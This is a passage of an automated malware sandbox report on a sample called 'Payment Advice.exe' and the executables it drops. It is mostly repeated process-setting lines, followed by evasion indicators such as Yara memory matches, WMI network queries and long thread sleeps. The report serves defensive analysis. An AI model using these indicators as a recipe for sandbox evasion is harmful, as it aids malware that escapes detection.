                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payment Advice.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Memory allocated: 1240000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Memory allocated: 3070000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Memory allocated: 820000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Thread delayed: delay time: 1199958
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Thread delayed: delay time: 1199828
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Thread delayed: delay time: 1199719
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4187
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5963
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 845
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Window / User API: threadDelayed 5328
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Window / User API: threadDelayed 4516
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Window / User API: threadDelayed 2012
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Window / User API: threadDelayed 7837
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window / User API: threadDelayed 6232
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window / User API: threadDelayed 3615
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window / User API: threadDelayed 3599
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window / User API: threadDelayed 6220
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 6772, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432, Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496, Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Payment Advice.exe TID: 7604, Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7616, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912, Thread sleep count: 39 > 30
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7912, Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7916, Thread sleep count: 2012 > 30
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe TID: 7916, Thread sleep count: 7837 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7980, Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7244, Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep count: 39 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 5752Thread sleep count: 3599 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 5752Thread sleep count: 6220 > 30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -98110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -97110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -96110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7876Thread sleep time: -95485s >= -30000s
